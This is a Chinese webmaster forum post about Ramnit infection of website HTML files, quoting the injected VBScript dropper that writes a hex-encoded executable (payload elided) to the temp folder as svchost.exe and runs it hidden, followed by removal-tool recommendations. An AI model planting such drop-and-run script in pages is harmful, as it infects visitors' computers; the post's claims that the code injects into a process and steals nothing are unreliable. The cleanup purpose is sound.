请选择 进入手机版 | 继续访问电脑版

管理员之家 - 网站管理员、站长技术与运营交流平台!

 找回密码
 注册
搜索
热搜: linux 服务器
查看: 209|回复: 1

[其它] HTML感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒解决办法

[复制链接]
发表于 2020-5-8 02:53:12 | 显示全部楼层 |阅读模式
说来也是相当奇怪,最近发现网站源码中有大量.html脚本文件,末尾处自动加入了相当多的VBS代码,变成了一个超大的文件。很可怕。显然,这是中了Ramnit感染型病毒。没关系,下面小编就教大家怎么杀死Ramnit感染型病毒。图为中招后的文件内容

03.jpg

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000........................此处省略N个字符串"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

这串script代码是一串vbs语言的 Ramnit感染型病毒,中了改病毒后你会发现你的本地所有html文档打开后都会有这样一串字符,不仅仅是html文档,连dll文档也会被感染。

当然这种病毒不要太惊慌,因为他只是起到破坏文件的作用,不会有上传隐私,盗号等危害。

这串代码大概意思就是找到svchost.exe这个进程然后注入数据运行,注入的就是后面的进制代码来运行。

这种病毒和其他病毒不同的是这种vbs病毒感染能力非常强,html文件一旦被感染,那么用户只要打开html文档病毒就运行上面改代码导致病毒直接感染到本地电脑全部html文件和dll文件。

解决办法:
一、赛门铁克Ramnit病毒专杀工具(推荐)
扫描速度快,自动清楚病毒,不损坏文件,缺点是自动杀毒,没有提醒与病毒日志。

未标题-1.png

二、使用火绒杀毒
注:火绒也可以查杀病毒,但是当被扫描的空间非常大时,比如超过了2T空间,软件在杀毒时或错,造成杀毒失败。

02.png

三、使用护卫神挂马清理工具
注:当扫描的空间非常大时,比如超过3T空间,此工具不稳定,扫描过程中会自动退出。
01.jpg

病毒源头:
02.jpg




 楼主| 发表于 2020-5-18 06:02:00 | 显示全部楼层
http://www.admin365.cn/thread-45212-1-1.html   DesktopLayer.exe病毒查

http://www.admin365.cn/thread-45211-1-1.html  HTML感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒解决办法

http://www.admin365.cn/thread-45224-1-1.html   HTML文件自动加入了VBS代码?教你解决Ramnit病毒

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|泗洪大湖网络科技有限公司 ( 苏ICP备13046962号-3 )

GMT+8, 2020-7-3 20:08 , Processed in 0.126236 second(s), 35 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表